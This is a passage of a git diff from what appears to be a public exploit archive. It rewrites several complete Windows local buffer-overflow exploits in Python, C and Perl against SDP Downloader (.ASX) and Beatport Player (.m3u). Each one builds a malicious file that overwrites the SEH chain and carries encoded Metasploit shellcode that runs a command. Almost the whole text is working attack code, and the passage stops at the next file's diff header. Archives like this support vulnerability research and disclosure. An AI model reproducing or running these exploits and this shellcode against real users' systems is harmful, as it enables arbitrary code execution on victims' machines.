+"\x51\x92\x42\x83"; +my $exploit = $header.$junk.$eip.$nopsleds.$sc; +$file = "zAx.lst"; +open(my $FILE, ">>$file") or die "Cannot open $file: $!"; +print $FILE $exploit ; +close($FILE); +print "Done \n"; + +# milw0rm.com [2009-03-19] diff --git a/platforms/windows/local/8536.py b/platforms/windows/local/8536.py index 7e79f05fa..4385de14d 100755 --- a/platforms/windows/local/8536.py +++ b/platforms/windows/local/8536.py 
@@ -1,66 +1,66 @@ -#usage: exploit.py -#[x]Note: In this case we have the problem of the safe_seh, but if the machine uses (idm) -# and the option "Use advanced browser integration is selected,then idmmbc.dll will be loaded the most of time. -print "**************************************************************************" -print "SDP Downloader v2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)\n" -print " Founder: Cyber-Zone" -print " Exploit code: His0k4" -print " Tested on: Windows XP Pro SP3 (EN)\n" -print " Greetings to:" -print " All friends & muslims HaCkers(dz),snakespc.com\n" -print "**************************************************************************" - - -header1 = ( - "\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33" - "\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54" - "\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54" - "\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46" - "\x3D\x22\x68\x74\x74\x70\x3a\x2f\x2f") - -header2 = ( - "\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59" - "\x3E\x3C\x2F\x41\x53\x58\x3E" ) - -buff = "\x41" * 529 -next_seh= "\x74\x06\x90\x90" -seh="\x89\x69\x01\x10" #idmmbc.dll -#seh = "\x43"*4 -junk="\x44"*50000 - -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" -"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47" -"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58" -"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38" -"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" 
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58" -"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54" -"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58" -"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43" -"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47" -"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a" -"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" -"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43" -"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37" -"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59" -"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56" -"\x4e\x56\x43\x36\x42\x30\x5a") - -exploit = header1 + buff + next_seh + seh + shellcode + junk + header2 - -try: - out_file = open("exploit.asx",'w') - out_file.write(exploit) - out_file.close() - raw_input("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-04-27] +#usage: exploit.py +#[x]Note: In this case we have the problem of the safe_seh, but if the machine uses (idm) +# and the option "Use advanced browser integration is selected,then idmmbc.dll will be loaded the most of time. 
+print "**************************************************************************" +print "SDP Downloader v2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)\n" +print " Founder: Cyber-Zone" +print " Exploit code: His0k4" +print " Tested on: Windows XP Pro SP3 (EN)\n" +print " Greetings to:" +print " All friends & muslims HaCkers(dz),snakespc.com\n" +print "**************************************************************************" + + +header1 = ( + "\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33" + "\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54" + "\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54" + "\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46" + "\x3D\x22\x68\x74\x74\x70\x3a\x2f\x2f") + +header2 = ( + "\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59" + "\x3E\x3C\x2F\x41\x53\x58\x3E" ) + +buff = "\x41" * 529 +next_seh= "\x74\x06\x90\x90" +seh="\x89\x69\x01\x10" #idmmbc.dll +#seh = "\x43"*4 +junk="\x44"*50000 + +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" +"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47" +"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58" +"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38" +"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58" +"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54" +"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58" 
+"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43" +"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47" +"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a" +"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" +"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43" +"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37" +"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59" +"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56" +"\x4e\x56\x43\x36\x42\x30\x5a") + +exploit = header1 + buff + next_seh + seh + shellcode + junk + header2 + +try: + out_file = open("exploit.asx",'w') + out_file.write(exploit) + out_file.close() + raw_input("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-04-27] diff --git a/platforms/windows/local/8540.c b/platforms/windows/local/8540.c index 4e025db19..39b7b4976 100755 --- a/platforms/windows/local/8540.c +++ b/platforms/windows/local/8540.c 
@@ -1,86 +1,86 @@ -/* SDP-BOF.c - * SDP Downloader Local Buffer overflow exploit [SEH] - * Credits : Cyber-Zone - * Exploit BY : - * SimO-s0fT (maroc-anti-connexion@hotmail.com) - * Shoot to : Stack & r1z & Str0ke - * - */ -#include <stdio.h> -#include <string.h> -#include <stdlib.h> - -#define OFFSET 529 -#define NOP 0x90 -char head1[]= -"\x3c\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4f\x4e\x3d\x22\x33\x2e" -"\x30\x22\x3e\x0d\x0a\x0d\x0a\x3c\x45\x4e\x54\x52\x59\x3e\x3c\x54" -"\x49\x54\x4c\x45\x3e\x65\x78\x70\x6c\x6f\x69\x74\x3c\x2f\x54\x49" -"\x54\x4c\x45\x3e\x0d\x0a\x3c\x52\x45\x46\x20\x48\x52\x45\x46\x3d" -"\x22\x68\x74\x74\x70\x3a\x2f\x2f"; -char head2[]= -"\x2e\x61\x73\x66\x22\x2f\x3e\x0d\x0a\x3c\x2f\x45\x4e\x54\x52\x59" -"\x3e\x3c\x2f\x41\x53\x58\x3e"; - -char scode[] = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" -"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x47" -"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48" -"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x38" -"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x48" -"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34" -"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x58" -"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43" -"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37" -"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a" -"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b" 
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x53\x4f\x55\x41\x53" -"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47" -"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x56\x4a\x59" -"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46" -"\x4e\x56\x43\x46\x50\x42\x45\x56\x4a\x57\x45\x56\x42\x30\x5a"; - -int main(int argc, char *argv[]){ - FILE *p; - unsigned char *buffer; - int n_seh=0x909010eb; - int seh=0x7C87DE34; - int i=0; -if(argc!=2){ - fprintf(stdout,"_______________________________________________________________________\n"); - fprintf(stdout,"\n\t\t SDP Downloader local Buffer overflow Exploit [seh]\n\n"); - printf("\tUSAGE : %s filename.asx\n",argv[0]); - fprintf(stdout,"_________________________________________________________________________\n"); - } -if((p=fopen(argv[1],"w+b"))==NULL){ - perror("error"); - return EXIT_FAILURE; - } -buffer=(unsigned char*) malloc(strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2)); -memset(buffer, 0x41, strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2)); -memcpy(buffer,head1, strlen(head1)); -i=OFFSET; -memcpy(buffer+strlen(head1)+i, &n_seh,4); -i+=4; -memcpy(buffer+strlen(head1)+i,&seh,4); -i+=4; -memset(buffer+strlen(head1)+i,0x90,10); -i+=10; -memcpy(buffer+strlen(head1)+i,scode,strlen(scode)); -i+=strlen(scode); -memcpy(buffer+strlen(head1)+i,head2,strlen(head2)); -i+=strlen(head2); - -fputs(buffer,p); -fclose(p); -printf("%s has benn created !! 
\n Have fun \n DONE"); -return 0x0; -} - -// milw0rm.com [2009-04-27] +/* SDP-BOF.c + * SDP Downloader Local Buffer overflow exploit [SEH] + * Credits : Cyber-Zone + * Exploit BY : + * SimO-s0fT (maroc-anti-connexion@hotmail.com) + * Shoot to : Stack & r1z & Str0ke + * + */ +#include <stdio.h> +#include <string.h> +#include <stdlib.h> + +#define OFFSET 529 +#define NOP 0x90 +char head1[]= +"\x3c\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4f\x4e\x3d\x22\x33\x2e" +"\x30\x22\x3e\x0d\x0a\x0d\x0a\x3c\x45\x4e\x54\x52\x59\x3e\x3c\x54" +"\x49\x54\x4c\x45\x3e\x65\x78\x70\x6c\x6f\x69\x74\x3c\x2f\x54\x49" +"\x54\x4c\x45\x3e\x0d\x0a\x3c\x52\x45\x46\x20\x48\x52\x45\x46\x3d" +"\x22\x68\x74\x74\x70\x3a\x2f\x2f"; +char head2[]= +"\x2e\x61\x73\x66\x22\x2f\x3e\x0d\x0a\x3c\x2f\x45\x4e\x54\x52\x59" +"\x3e\x3c\x2f\x41\x53\x58\x3e"; + +char scode[] = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" +"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x47" +"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48" +"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x38" +"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x48" +"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34" +"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x58" +"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43" +"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37" +"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a" +"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b" 
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x53\x4f\x55\x41\x53" +"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47" +"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x56\x4a\x59" +"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46" +"\x4e\x56\x43\x46\x50\x42\x45\x56\x4a\x57\x45\x56\x42\x30\x5a"; + +int main(int argc, char *argv[]){ + FILE *p; + unsigned char *buffer; + int n_seh=0x909010eb; + int seh=0x7C87DE34; + int i=0; +if(argc!=2){ + fprintf(stdout,"_______________________________________________________________________\n"); + fprintf(stdout,"\n\t\t SDP Downloader local Buffer overflow Exploit [seh]\n\n"); + printf("\tUSAGE : %s filename.asx\n",argv[0]); + fprintf(stdout,"_________________________________________________________________________\n"); + } +if((p=fopen(argv[1],"w+b"))==NULL){ + perror("error"); + return EXIT_FAILURE; + } +buffer=(unsigned char*) malloc(strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2)); +memset(buffer, 0x41, strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2)); +memcpy(buffer,head1, strlen(head1)); +i=OFFSET; +memcpy(buffer+strlen(head1)+i, &n_seh,4); +i+=4; +memcpy(buffer+strlen(head1)+i,&seh,4); +i+=4; +memset(buffer+strlen(head1)+i,0x90,10); +i+=10; +memcpy(buffer+strlen(head1)+i,scode,strlen(scode)); +i+=strlen(scode); +memcpy(buffer+strlen(head1)+i,head2,strlen(head2)); +i+=strlen(head2); + +fputs(buffer,p); +fclose(p); +printf("%s has benn created !! \n Have fun \n DONE"); +return 0x0; +} + +// milw0rm.com [2009-04-27] diff --git a/platforms/windows/local/8590.py b/platforms/windows/local/8590.py index e3cb48d73..a9dffa75c 100755 --- a/platforms/windows/local/8590.py +++ b/platforms/windows/local/8590.py 
@@ -1,39 +1,39 @@ -#usage: exploit.py -# Grab the exploit file into the program -print "**************************************************************************" -print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n" -print " Refer: http://www.milw0rm.com/exploits/8588\n" -print " Exploit code: His0k4\n" -print " Tested on: Windows XP Pro SP3 (EN)\n" -print " greetz: TO ELITE ALGERIANS,snakespc.com\n" -print "**************************************************************************" - - -buff = "\x41" * 1232 -next_seh = "\xEB\x06\x90\x90" -seh = "\xB8\x15\xD1\x72" #msacm32.drv - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -shellcode = ( -"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8" -"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73" -"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f" -"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b" -"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50" -"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12" -"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd" -"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e" -"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32" -"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36") - -exploit = buff + next_seh + seh + shellcode - -try: - out_file = open("exploit.m3u",'w') - out_file.write(exploit) - out_file.close() - raw_input("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-05-01] +#usage: exploit.py +# Grab the exploit file into the program +print "**************************************************************************" +print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n" +print " Refer: http://www.milw0rm.com/exploits/8588\n" +print " Exploit code: His0k4\n" +print " Tested on: Windows XP Pro SP3 (EN)\n" +print " greetz: TO ELITE 
ALGERIANS,snakespc.com\n" +print "**************************************************************************" + + +buff = "\x41" * 1232 +next_seh = "\xEB\x06\x90\x90" +seh = "\xB8\x15\xD1\x72" #msacm32.drv + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +shellcode = ( +"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8" +"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73" +"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f" +"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b" +"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50" +"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12" +"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd" +"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e" +"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32" +"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36") + +exploit = buff + next_seh + seh + shellcode + +try: + out_file = open("exploit.m3u",'w') + out_file.write(exploit) + out_file.close() + raw_input("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-05-01] diff --git a/platforms/windows/local/8591.py b/platforms/windows/local/8591.py index 1000dfeea..4331c6d3a 100755 --- a/platforms/windows/local/8591.py +++ b/platforms/windows/local/8591.py 
@@ -1,49 +1,49 @@ -#exploit.py -# -# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit -# By: Encrypt3d.M!nd -# -# Tested on : Windows xp sp2 -# - -chars = "\x41" * 1232 - -ns = "\xEB\x06\x90\x90" -sh = "\x35\x2F\xD1\x72" - -nops = "\x90" * 20 - -# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 -Encoder=PexAlphaNum http://metasploit.com - -shellcode=( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" -"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x47" -"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x58" -"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x38" -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x58" -"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44" -"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x48\x4e\x51\x4b\x38" -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x30\x43\x4c\x41\x33" -"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47" -"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a" -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b" -"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x56\x4e\x33\x4f\x35\x41\x53" -"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37" -"\x42\x35\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x4a\x46\x4a\x39" -"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36" -"\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x37\x45\x56\x42\x50\x5a") - - - -file=open('Devil_inside.m3u','w') -file.write(chars+ns+sh+nops+shellcode) -file.close() - -# milw0rm.com [2009-05-01] 
+#exploit.py +# +# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow Exploit +# By: Encrypt3d.M!nd +# +# Tested on : Windows xp sp2 +# + +chars = "\x41" * 1232 + +ns = "\xEB\x06\x90\x90" +sh = "\x35\x2F\xD1\x72" + +nops = "\x90" * 20 + +# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 +Encoder=PexAlphaNum http://metasploit.com + +shellcode=( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" +"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x47" +"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x58" +"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x38" +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x37\x45\x4e\x4b\x58" +"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44" +"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x48\x4e\x51\x4b\x38" +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x30\x43\x4c\x41\x33" +"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47" +"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a" +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b" +"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x56\x4e\x33\x4f\x35\x41\x53" +"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37" +"\x42\x35\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x4a\x46\x4a\x39" +"\x50\x4f\x4c\x58\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36" +"\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x37\x45\x56\x42\x50\x5a") + + + +file=open('Devil_inside.m3u','w') +file.write(chars+ns+sh+nops+shellcode) +file.close() + +# milw0rm.com [2009-05-01] 
diff --git a/platforms/windows/local/8592.pl b/platforms/windows/local/8592.pl index 433aecbcd..207f17555 100755 --- a/platforms/windows/local/8592.pl +++ b/platforms/windows/local/8592.pl 
